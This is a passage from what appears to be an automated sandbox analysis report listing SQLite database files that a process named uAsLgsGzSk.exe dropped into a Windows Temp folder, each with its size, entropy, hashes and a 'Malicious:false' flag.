                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\HgVGrrclZ5

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\HywXUMI3h6

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\IH3efSOE3x

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\IgIGflH6Fv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\IgJIsC2bdT

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\IwWGe7C2En

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\IxEK1fq2XY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\J0GF4G7L49

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\JWpPzCJOs8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\JoqRm6JDBE

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\K9b7NkCx7g

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\KDSrAB9Ggx

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\L983ARMqGw

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\LCSF4Vpyz4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\MPd4dmCGmB

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Mt8pbGrFQs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\NAzK4nYR4E

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\O28a1qBBDe

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\OFjQZB9bNl

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\OGVdasuS1t

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\OL8MMawhal

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\OSnXcSc0Cm

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\OmVi3cd65F

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

